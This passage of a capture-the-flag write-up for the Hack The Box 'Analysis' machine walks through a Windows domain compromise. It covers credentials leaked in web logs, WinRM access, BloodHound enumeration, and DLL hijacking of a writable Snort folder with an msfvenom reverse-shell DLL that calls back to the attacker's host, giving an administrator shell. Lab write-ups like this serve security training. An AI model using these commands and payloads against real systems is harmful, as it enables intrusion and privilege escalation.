10.10.16.7 - - [09/Aug/2025:13:42:42 +0200] "GET /users/username_check.php HTTP/1.1" 404 1416
10.10.16.7 - - [09/Aug/2025:13:42:51 +0200] "GET /dashboard/username_check HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:42:52 +0200] "GET /dashboard/username_check.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:42:52 +0200] "GET /dashboard/js/username_check HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:42:52 +0200] "GET /dashboard/css/username_check HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:42:52 +0200] "GET /dashboard/js/username_check.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:42:53 +0200] "GET /dashboard/css/username_check.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:42:53 +0200] "GET /dashboard/img/username_check HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:42:53 +0200] "GET /dashboard/img/username_check.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:42:53 +0200] "GET /dashboard/uploads/username_check HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:42:53 +0200] "GET /dashboard/lib/username_check HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:42:53 +0200] "GET /dashboard/uploads/username_check.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:42:53 +0200] "GET /dashboard/lib/username_check.php HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:43:00 +0200] "GET /employees/username_check HTTP/1.1" 404 1416
10.10.16.7 - - [09/Aug/2025:13:43:00 +0200] "GET /employees/username_check.php HTTP/1.1" 404 1416
10.10.16.7 - - [09/Aug/2025:13:43:20 +0200] "GET /dashboard/lib/chart/username_check HTTP/1.1" 404 1397
10.10.16.7 - - [09/Aug/2025:13:43:20 +0200] "GET /dashboard/lib/chart/username_check.php HTTP/1.1" 404 1397
127.0.0.1 - - [09/Aug/2025:13:46:23 +0200] "GET /dashboard/alert_panel.php?auth=1&username=jdoe&password=7y4Z4%5E*y9Zzj&alert=c2_malware_detected HTTP/1.1" 200 8924
10.10.16.7 - - [09/Aug/2025:13:46:23 +0200] "GET /users/usernames.txt HTTP/1.1" 404 1416
10.10.16.7 - - [09/Aug/2025:13:52:22 +0200] "GET /users/list.php?username_exists= HTTP/1.1" 200 186
10.10.16.7 - - [09/Aug/2025:13:52:22 +0200] "GET /users/list.php?validate_username= HTTP/1.1" 200 186
10.10.16.7 - - [09/Aug/2025:13:52:49 +0200] "GET /users/list.php?username= HTTP/1.1" 200 186
127.0.0.1 - - [09/Aug/2025:14:30:23 +0200] "GET /dashboard/alert_panel.php?auth=1&username=jdoe&password=7y4Z4%5E*y9Zzj&alert=c2_malware_detected HTTP/1.1" 200 8924
127.0.0.1 - - [09/Aug/2025:15:14:23 +0200] "GET /dashboard/alert_panel.php?auth=1&username=jdoe&password=7y4Z4%5E*y9Zzj&alert=c2_malware_detected HTTP/1.1" 200 8924
127.0.0.1 - - [09/Aug/2025:15:58:22 +0200] "GET /dashboard/alert_panel.php?auth=1&username=jdoe&password=7y4Z4%5E*y9Zzj&alert=c2_malware_detected HTTP/1.1" 200 8924
127.0.0.1 - - [09/Aug/2025:16:42:23 +0200] "GET /dashboard/alert_panel.php?auth=1&username=jdoe&password=7y4Z4%5E*y9Zzj&alert=c2_malware_detected HTTP/1.1" 200 8924
C:\\inetpub\\logs\\LogFiles\\W3SVC2>
we can winrm
└─$ netexec smb analysis.htb -u jdoe -p '7y4Z4^*y9Zzj'
SMB 10.10.11.250 445 DC-ANALYSIS [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-ANALYSIS) (domain:analysis.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.250 445 DC-ANALYSIS [+] analysis.htb\\jdoe:7y4Z4^*y9Zzj
┌──(anurag㉿anurag)-[~/htb/Analysis]
└─$ netexec winrm analysis.htb -u jdoe -p '7y4Z4^*y9Zzj'
WINRM 10.10.11.250 5985 DC-ANALYSIS [*] Windows 10 / Server 2019 Build 17763 (name:DC-ANALYSIS) (domain:analysis.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.250 5985 DC-ANALYSIS [+] analysis.htb\\jdoe:7y4Z4^*y9Zzj (Pwn3d!)
┌──(anurag㉿anurag)-[~/htand we found user.txt
Directory: C:\\Users\\jdoe\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/9/2025 12:57 PM 34 user.txt
Privilege Escalation
Shell as ?
found encoded text
Directory: C:\\private
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/26/2023 9:44 AM 576 encoded.txt
*Evil-WinRM* PS C:\\private> type encoded.txt
-----BEGIN ENCODED MESSAGE-----
Version: BCTextEncoder Utility v. 1.03.2.1
wy4ECQMCq0jPQTxt+3BgTzQTBPQFbt5KnV7LgBq6vcKWtbdKAf59hbw0KGN9lBIK
0kcBSYXfHU2s7xsWA3pCtjthI0lge3SyLOMw9T81CPqT3HOIKkh3SVcO9jdrxfwu
pHnjX+5HyybuBwIQwGprgyWdGnyv3mfcQQ==
=a7bc
-----END ENCODED MESSAGE-----
*Evil-WinRM* PS C:\\private>
Looks like we will need the password or passphrase to decrypt, for now i will leave it and use Bloodhound
Bloodhound
└─$ bloodhound-python -u 'jdoe' -p '7y4Z4^*y9Zzj' -d analysis.htb -ns 10.10.11.250 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: analysis.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc-analysis.analysis.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc-analysis.analysis.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc-analysis.analysis.htb
INFO: Found 15 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC-ANALYSIS.analysis.htb
INFO: Done in 01M 24S
INFO: Compressing output into 20250809203906_bloodhound.zip From this we got to know that WSMITH@ANALYSIS -> ForceChangePassword/ GenericWrite -> SOC_ANALYST@ANALYSIS.HTB
and SOC_ANALYST@ANALYSIS.HTB -> DCSync -> ANALYSIS.HTB
But we don’t have Wsmith credentials
DLL Hijacking
Let’s run winPEASx64.exe
In Interesting Services -non Microsoft- I found this
Which is the Snort service that is running
After checking the permissions on the lib directroy in C:\\Snort\\lib
*Evil-WinRM* PS C:\\Snort\\lib> icacls snort_dynamicpreprocessor
snort_dynamicpreprocessor AUTORITE NT\\SystŠme:(I)(OI)(CI)(F)
BUILTIN\\Administrateurs:(I)(OI)(CI)(F)
BUILTIN\\Utilisateurs:(I)(OI)(CI)(RX)
BUILTIN\\Utilisateurs:(I)(CI)(AD)
BUILTIN\\Utilisateurs:(I)(CI)(WD)
CREATEUR PROPRIETAIRE:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
*Evil-WinRM* PS C:\\Snort\\lib> The ACL output is showing us that the snort_dynamicpreprocessor folder is writable by BUILTIN\Utilisateurs (which means any standard user).
This means any standard user can add or overwrite files inside snort_dynamicpreprocessor.
(F) → Full control
(RX) → Read & execute
(AD) → Add file
(WD) → Write data
(I) → Inherited
(OI)/(CI) → Object inherit / Container inherit (permissions apply to files and folders within)
Given that I can write data to that directory, I should be able to generate a DLL, write it there, and get execution the next time Snort runs.
Let’s generate the dll and upload
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.7 LPORT=1234 -f dll -a x64 -o anurag.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: anurag.dll*Evil-WinRM* PS C:\\Snort\\lib\\snort_dynamicpreprocessor> upload /home/anurag/htb/Analysis/anurag.dll
Info: Uploading /home/anurag/htb/Analysis/anurag.dll to C:\\Snort\\lib\\snort_dynamicpreprocessor\\anurag.dll
Data: 12288 bytes of 12288 bytes copied
Info: Upload successful!The next time Snort runs (every even minute), there’s a shell as an administrator at nc:
└─$ nc -nlvp 1234
listening on [any] 1234 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.250] 49843
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Windows\\system32>whoami
whoami
analysis\\administrateur
C:\\Windows\\system32>and we got root.txt
Directory of C:\\Users\\Administrateur\\Desktop
01/10/2024 11:41 AM <DIR> .
01/10/2024 11:41 AM <DIR> ..
08/10/2025 09:32 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 4,053,364,736 bytes free
C:\\Users\\Administrateur\\Desktop>Last updated